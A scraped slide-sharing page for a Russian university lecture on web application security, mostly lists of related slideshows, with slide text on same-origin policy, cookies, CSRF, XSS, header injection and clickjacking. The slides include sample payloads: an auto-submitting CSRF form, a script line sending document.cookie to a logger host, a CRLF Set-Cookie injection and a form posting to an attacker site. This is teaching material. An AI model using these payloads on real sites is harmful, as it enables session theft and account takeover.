Enviar búsqueda
Cargar
Безопасность интернет-приложений осень 2013 лекция 4
•
0 recomendaciones
•
394 vistas
T
Technopark
Seguir
Educación
Denunciar
Compartir
Denunciar
Compartir
1 de 38
Descargar ahora
Descargar para leer sin conexión
Recomendados
17 - Web-технологии. Real Time сообщения
17 - Web-технологии. Real Time сообщения
Roman Brovko
Массовые операции над письмами в Яндекс.Почте — Денис Кутуков
Массовые операции над письмами в Яндекс.Почте — Денис Кутуков
Yandex
Finstream.gateway
Finstream.gateway
Artem Reva
05 - Web-технологии. Сетевые протоколы
05 - Web-технологии. Сетевые протоколы
Roman Brovko
MySQL/InnoDB изнутри: узкие места / Александр Крижановский (NatSys Lab)
MySQL/InnoDB изнутри: узкие места / Александр Крижановский (NatSys Lab)
Ontico
WWW
WWW
Евгений Евсеев
Отдаем страницы быстрее или как вписаться в требования Google
Отдаем страницы быстрее или как вписаться в требования Google
IT61
Gfi Archiver - больше, чем просто резервная копия!
Gfi Archiver - больше, чем просто резервная копия!
Expolink
Recomendados
17 - Web-технологии. Real Time сообщения
17 - Web-технологии. Real Time сообщения
Roman Brovko
Массовые операции над письмами в Яндекс.Почте — Денис Кутуков
Массовые операции над письмами в Яндекс.Почте — Денис Кутуков
Yandex
Finstream.gateway
Finstream.gateway
Artem Reva
05 - Web-технологии. Сетевые протоколы
05 - Web-технологии. Сетевые протоколы
Roman Brovko
MySQL/InnoDB изнутри: узкие места / Александр Крижановский (NatSys Lab)
MySQL/InnoDB изнутри: узкие места / Александр Крижановский (NatSys Lab)
Ontico
WWW
WWW
Евгений Евсеев
Отдаем страницы быстрее или как вписаться в требования Google
Отдаем страницы быстрее или как вписаться в требования Google
IT61
Gfi Archiver - больше, чем просто резервная копия!
Gfi Archiver - больше, чем просто резервная копия!
Expolink
Eugene Lisitsky Web Sockets
Eugene Lisitsky Web Sockets
guest092df8
Kolibri OS
Kolibri OS
IT Club Mykolayiv
07 - Web-технологии. Web-сервера
07 - Web-технологии. Web-сервера
Roman Brovko
WebSockets в Twisted
WebSockets в Twisted
Sergey Kirillov
08 - Web-технологии. Архитектура frontend-backend
08 - Web-технологии. Архитектура frontend-backend
Roman Brovko
Eugene Lisitsky Web Sockets
Eugene Lisitsky Web Sockets
rit2010
Web sockets
Web sockets
Eugene Lisitsky
HTTP протокол
HTTP протокол
lectureswww lectureswww
VDS: обнаружение, выявление причин и устранение проблемных ситуаций. Диагнос...
VDS: обнаружение, выявление причин и устранение проблемных ситуаций. Диагнос...
Oleg Lipin
7 яшз
7 яшз
fddddddddddddddddd
Все о скорости сайтов. Мастер-класс на партнерской конференции 1С-Битрикс.
Все о скорости сайтов. Мастер-класс на партнерской конференции 1С-Битрикс.
rusonyx
TMPA-2015: Multi-Platform Approach to Reverse Debugging of Virtual Machines
TMPA-2015: Multi-Platform Approach to Reverse Debugging of Virtual Machines
Iosif Itkin
Работа с большими файлами под перлом
Работа с большими файлами под перлом
mayperl
Web socket и приложения реального времени
Web socket и приложения реального времени
Oleksandr Voytsekhovskyy
Web весна 2013 лекция 3
Web весна 2013 лекция 3
Technopark
2014.10.15 Сергей Бурладян, Avito.ru
2014.10.15 Сергей Бурладян, Avito.ru
Nikolay Samokhvalov
Сокеты
Сокеты
lectureswww lectureswww
Безопасность интернет-приложений осень 2013 лекция 7
Безопасность интернет-приложений осень 2013 лекция 7
Technopark
Безопасность весна 2014 лекция 7
Безопасность весна 2014 лекция 7
Technopark
HighLoad весна 2014 лекция 5
HighLoad весна 2014 лекция 5
Technopark
Безопасность интернет-приложений осень 2013 лекция 3
Безопасность интернет-приложений осень 2013 лекция 3
Technopark
Разработка веб-сервисов осень 2013 лекция 12
Разработка веб-сервисов осень 2013 лекция 12
Technopark
Más contenido relacionado
La actualidad más candente
Eugene Lisitsky Web Sockets
Eugene Lisitsky Web Sockets
guest092df8
Kolibri OS
Kolibri OS
IT Club Mykolayiv
07 - Web-технологии. Web-сервера
07 - Web-технологии. Web-сервера
Roman Brovko
WebSockets в Twisted
WebSockets в Twisted
Sergey Kirillov
08 - Web-технологии. Архитектура frontend-backend
08 - Web-технологии. Архитектура frontend-backend
Roman Brovko
Eugene Lisitsky Web Sockets
Eugene Lisitsky Web Sockets
rit2010
Web sockets
Web sockets
Eugene Lisitsky
HTTP протокол
HTTP протокол
lectureswww lectureswww
VDS: обнаружение, выявление причин и устранение проблемных ситуаций. Диагнос...
VDS: обнаружение, выявление причин и устранение проблемных ситуаций. Диагнос...
Oleg Lipin
7 яшз
7 яшз
fddddddddddddddddd
Все о скорости сайтов. Мастер-класс на партнерской конференции 1С-Битрикс.
Все о скорости сайтов. Мастер-класс на партнерской конференции 1С-Битрикс.
rusonyx
TMPA-2015: Multi-Platform Approach to Reverse Debugging of Virtual Machines
TMPA-2015: Multi-Platform Approach to Reverse Debugging of Virtual Machines
Iosif Itkin
Работа с большими файлами под перлом
Работа с большими файлами под перлом
mayperl
Web socket и приложения реального времени
Web socket и приложения реального времени
Oleksandr Voytsekhovskyy
Web весна 2013 лекция 3
Web весна 2013 лекция 3
Technopark
2014.10.15 Сергей Бурладян, Avito.ru
2014.10.15 Сергей Бурладян, Avito.ru
Nikolay Samokhvalov
Сокеты
Сокеты
lectureswww lectureswww
La actualidad más candente
(17)
Eugene Lisitsky Web Sockets
Eugene Lisitsky Web Sockets
Kolibri OS
Kolibri OS
07 - Web-технологии. Web-сервера
07 - Web-технологии. Web-сервера
WebSockets в Twisted
WebSockets в Twisted
08 - Web-технологии. Архитектура frontend-backend
08 - Web-технологии. Архитектура frontend-backend
Eugene Lisitsky Web Sockets
Eugene Lisitsky Web Sockets
Web sockets
Web sockets
HTTP протокол
HTTP протокол
VDS: обнаружение, выявление причин и устранение проблемных ситуаций. Диагнос...
VDS: обнаружение, выявление причин и устранение проблемных ситуаций. Диагнос...
7 яшз
7 яшз
Все о скорости сайтов. Мастер-класс на партнерской конференции 1С-Битрикс.
Все о скорости сайтов. Мастер-класс на партнерской конференции 1С-Битрикс.
TMPA-2015: Multi-Platform Approach to Reverse Debugging of Virtual Machines
TMPA-2015: Multi-Platform Approach to Reverse Debugging of Virtual Machines
Работа с большими файлами под перлом
Работа с большими файлами под перлом
Web socket и приложения реального времени
Web socket и приложения реального времени
Web весна 2013 лекция 3
Web весна 2013 лекция 3
2014.10.15 Сергей Бурладян, Avito.ru
2014.10.15 Сергей Бурладян, Avito.ru
Сокеты
Сокеты
Destacado
Безопасность интернет-приложений осень 2013 лекция 7
Безопасность интернет-приложений осень 2013 лекция 7
Technopark
Безопасность весна 2014 лекция 7
Безопасность весна 2014 лекция 7
Technopark
HighLoad весна 2014 лекция 5
HighLoad весна 2014 лекция 5
Technopark
Безопасность интернет-приложений осень 2013 лекция 3
Безопасность интернет-приложений осень 2013 лекция 3
Technopark
Разработка веб-сервисов осень 2013 лекция 12
Разработка веб-сервисов осень 2013 лекция 12
Technopark
Управление продуктом весна 2014 лекция 4
Управление продуктом весна 2014 лекция 4
Technopark
Разработка веб-сервисов осень 2013 лекция 1 1
Разработка веб-сервисов осень 2013 лекция 1 1
Technopark
Destacado
(7)
Безопасность интернет-приложений осень 2013 лекция 7
Безопасность интернет-приложений осень 2013 лекция 7
Безопасность весна 2014 лекция 7
Безопасность весна 2014 лекция 7
HighLoad весна 2014 лекция 5
HighLoad весна 2014 лекция 5
Безопасность интернет-приложений осень 2013 лекция 3
Безопасность интернет-приложений осень 2013 лекция 3
Разработка веб-сервисов осень 2013 лекция 12
Разработка веб-сервисов осень 2013 лекция 12
Управление продуктом весна 2014 лекция 4
Управление продуктом весна 2014 лекция 4
Разработка веб-сервисов осень 2013 лекция 1 1
Разработка веб-сервисов осень 2013 лекция 1 1
Similar a Безопасность интернет-приложений осень 2013 лекция 4
Web осень 2013 лекция 3
Web осень 2013 лекция 3
Technopark
"Системы уникализации и идентификации пользователей в сети. Методы защиты от ...
"Системы уникализации и идентификации пользователей в сети. Методы защиты от ...
HackIT Ukraine
Web осень 2012 лекция 3
Web осень 2012 лекция 3
Technopark
JavaScript Базовый. Занятие 08.
JavaScript Базовый. Занятие 08.
Igor Shkulipa
Web весна 2012 лекция 3
Web весна 2012 лекция 3
Technopark
Distributed nets
Distributed nets
zagru
Open protocols as base for social distributed networks
Open protocols as base for social distributed networks
Транслируем.бел
Алексей Андросов "HTML5 в Я.Почте"
Алексей Андросов "HTML5 в Я.Почте"
Yandex
О безопасном использовании PHP wrappers
О безопасном использовании PHP wrappers
Positive Hack Days
Кэширование
Кэширование
Igor Kapkov
Вячеслав Бирюков - HTTP и HTTPS
Вячеслав Бирюков - HTTP и HTTPS
Yandex
Mihail davidov js-ajax
Mihail davidov js-ajax
Yandex
Михаил Давыдов — Транспорт, Ajax
Михаил Давыдов — Транспорт, Ajax
Yandex
Http session
Http session
Oleg Kalyta
Интерактивность в Html5
Интерактивность в Html5
Alexander Samantsov
Алексей Андросов "HTML5 в Я.Почте (WebSocket, localStorage, Cross-site XHR)"
Алексей Андросов "HTML5 в Я.Почте (WebSocket, localStorage, Cross-site XHR)"
Yandex
Aleksey Androsov
Aleksey Androsov
yaevents
модуль 1
модуль 1
Евгений Решетников
бегун
бегун
HighLoad2009
Что нового в nginx? / Максим Дунин (Nginx, Inc.)
Что нового в nginx? / Максим Дунин (Nginx, Inc.)
Ontico
Similar a Безопасность интернет-приложений осень 2013 лекция 4
(20)
Web осень 2013 лекция 3
Web осень 2013 лекция 3
"Системы уникализации и идентификации пользователей в сети. Методы защиты от ...
"Системы уникализации и идентификации пользователей в сети. Методы защиты от ...
Web осень 2012 лекция 3
Web осень 2012 лекция 3
JavaScript Базовый. Занятие 08.
JavaScript Базовый. Занятие 08.
Web весна 2012 лекция 3
Web весна 2012 лекция 3
Distributed nets
Distributed nets
Open protocols as base for social distributed networks
Open protocols as base for social distributed networks
Алексей Андросов "HTML5 в Я.Почте"
Алексей Андросов "HTML5 в Я.Почте"
О безопасном использовании PHP wrappers
О безопасном использовании PHP wrappers
Кэширование
Кэширование
Вячеслав Бирюков - HTTP и HTTPS
Вячеслав Бирюков - HTTP и HTTPS
Mihail davidov js-ajax
Mihail davidov js-ajax
Михаил Давыдов — Транспорт, Ajax
Михаил Давыдов — Транспорт, Ajax
Http session
Http session
Интерактивность в Html5
Интерактивность в Html5
Алексей Андросов "HTML5 в Я.Почте (WebSocket, localStorage, Cross-site XHR)"
Алексей Андросов "HTML5 в Я.Почте (WebSocket, localStorage, Cross-site XHR)"
Aleksey Androsov
Aleksey Androsov
модуль 1
модуль 1
бегун
бегун
Что нового в nginx? / Максим Дунин (Nginx, Inc.)
Что нового в nginx? / Максим Дунин (Nginx, Inc.)
Más de Technopark
Лекция 11. Вычислительная модель Pregel
Лекция 11. Вычислительная модель Pregel
Technopark
Лекция 14. Hadoop в Поиске Mail.Ru
Лекция 14. Hadoop в Поиске Mail.Ru
Technopark
Лекция 13. YARN
Лекция 13. YARN
Technopark
Лекция 12. Spark
Лекция 12. Spark
Technopark
Лекция 10. Apache Mahout
Лекция 10. Apache Mahout
Technopark
Лекция 9. ZooKeeper
Лекция 9. ZooKeeper
Technopark
Лекция 7. Введение в Pig и Hive
Лекция 7. Введение в Pig и Hive
Technopark
Лекция 6. MapReduce в Hadoop (графы)
Лекция 6. MapReduce в Hadoop (графы)
Technopark
Лекция 5. MapReduce в Hadoop (алгоритмы)
Лекция 5. MapReduce в Hadoop (алгоритмы)
Technopark
Лекция 4. MapReduce в Hadoop (введение)
Лекция 4. MapReduce в Hadoop (введение)
Technopark
Лекция 3. Распределённая файловая система HDFS
Лекция 3. Распределённая файловая система HDFS
Technopark
Лекция 2. Основы Hadoop
Лекция 2. Основы Hadoop
Technopark
Лекция 1. Введение в Big Data и MapReduce
Лекция 1. Введение в Big Data и MapReduce
Technopark
СУБД 2013 Лекция №10 "Нереляционное решение в области баз данных — NoSQL"
СУБД 2013 Лекция №10 "Нереляционное решение в области баз данных — NoSQL"
Technopark
СУБД 2013 Лекция №10 "Нереляционное решение в области баз данных — NoSQL" Час...
СУБД 2013 Лекция №10 "Нереляционное решение в области баз данных — NoSQL" Час...
Technopark
СУБД 2013 Лекция №9 "Безопасность баз данных"
СУБД 2013 Лекция №9 "Безопасность баз данных"
Technopark
СУБД 2013 Лекция №8 "Конфигурирование базы данных"
СУБД 2013 Лекция №8 "Конфигурирование базы данных"
Technopark
СУБД 2013 Лекция №7 "Оптимизация запросов и индексирование"
СУБД 2013 Лекция №7 "Оптимизация запросов и индексирование"
Technopark
СУБД 2013 Лекция №5 "Определение узких мест"
СУБД 2013 Лекция №5 "Определение узких мест"
Technopark
СУБД 2013 Лекция №6 "Профилирование запросов. Сложноструктурированные SQL-зап...
СУБД 2013 Лекция №6 "Профилирование запросов. Сложноструктурированные SQL-зап...
Technopark
Más de Technopark
(20)
Лекция 11. Вычислительная модель Pregel
Лекция 11. Вычислительная модель Pregel
Лекция 14. Hadoop в Поиске Mail.Ru
Лекция 14. Hadoop в Поиске Mail.Ru
Лекция 13. YARN
Лекция 13. YARN
Лекция 12. Spark
Лекция 12. Spark
Лекция 10. Apache Mahout
Лекция 10. Apache Mahout
Лекция 9. ZooKeeper
Лекция 9. ZooKeeper
Лекция 7. Введение в Pig и Hive
Лекция 7. Введение в Pig и Hive
Лекция 6. MapReduce в Hadoop (графы)
Лекция 6. MapReduce в Hadoop (графы)
Лекция 5. MapReduce в Hadoop (алгоритмы)
Лекция 5. MapReduce в Hadoop (алгоритмы)
Лекция 4. MapReduce в Hadoop (введение)
Лекция 4. MapReduce в Hadoop (введение)
Лекция 3. Распределённая файловая система HDFS
Лекция 3. Распределённая файловая система HDFS
Лекция 2. Основы Hadoop
Лекция 2. Основы Hadoop
Лекция 1. Введение в Big Data и MapReduce
Лекция 1. Введение в Big Data и MapReduce
СУБД 2013 Лекция №10 "Нереляционное решение в области баз данных — NoSQL"
СУБД 2013 Лекция №10 "Нереляционное решение в области баз данных — NoSQL"
СУБД 2013 Лекция №10 "Нереляционное решение в области баз данных — NoSQL" Час...
СУБД 2013 Лекция №10 "Нереляционное решение в области баз данных — NoSQL" Час...
СУБД 2013 Лекция №9 "Безопасность баз данных"
СУБД 2013 Лекция №9 "Безопасность баз данных"
СУБД 2013 Лекция №8 "Конфигурирование базы данных"
СУБД 2013 Лекция №8 "Конфигурирование базы данных"
СУБД 2013 Лекция №7 "Оптимизация запросов и индексирование"
СУБД 2013 Лекция №7 "Оптимизация запросов и индексирование"
СУБД 2013 Лекция №5 "Определение узких мест"
СУБД 2013 Лекция №5 "Определение узких мест"
СУБД 2013 Лекция №6 "Профилирование запросов. Сложноструктурированные SQL-зап...
СУБД 2013 Лекция №6 "Профилирование запросов. Сложноструктурированные SQL-зап...
Безопасность интернет-приложений осень 2013 лекция 4
1.
2.
2
3.
- Браузер Место положения Открытые сессии Пользователь 3
4.
PROTOCOL://DOMAIN:port Одинаковый источник: http://example.com/ http://example.com/folder/ Разный источник: http://example.com/ https://example.com/ http://test.example.com/ http://example.com:8080/ http://othersample.com/ 4
5.
http://kiwi.com/test_restrict.html 5
6.
http://kiwi.com/test_restrict.html 6
7.
http://kiwi.com/test_restrict.html 7
8.
http://kiwi.com/test_restrict.html 8
9.
http://kiwi.com/test_restrict.html http://kiwi.com/src_restrict.html 9
10.
http://www.kiwi.com/test_restrict.html 10
11.
XMLHttpRequest - Метод запроса Заголовок запроса Чтение
заголовков Чтение ответа 11
12.
ограничения: - время жизни
(expires,max-age) - локация (path, domain) - дополнительные аттрибуты (httponly, secure) ..domain=.target.com – любой поддомен target.com 12
13.
13
14.
link code req1 req2 14
15.
… <img src=‘http://target.com/killme?id=1’> … … <form action=‘http://target.com/killme’> <input
type=hidden name=id value=1> </form> … <script>submitForm()</script> 15
16.
link link Injected responce 16
17.
17
18.
18
19.
19
20.
20
21.
21
22.
document.write() document.writeln() eval() .innerHTML etc flash: getURL(_root.param,”_blank”) 22
23.
… new Image().src="http://logger.com/?c="+encodeURI(document.cookie); … 23
24.
24
25.
25
26.
26
27.
27
28.
28
29.
http://target.com?jump=<user input> … Location: <user
input> … http://target.com?jump=hell%0d%0aSet-Cookie: gotohell%3d1 … Location: hell Set-Cookie: gotohell=1 … 29
30.
30
31.
Split (target.com/somevuln/) target.com target (target.com/admin/) 31
32.
Split (target.com/somevuln/) target.com target (target.com/admin/) 32
33.
target.com 33
34.
target.com Fake target (target.com/admin/) … <form
action=“evilsite.com”> … 34
35.
Upgrade Upgrade 35
36.
36
37.
...style='position:absolute; left:0px; top:0px; z-index:10000;'... 37
38.
38
Descargar ahora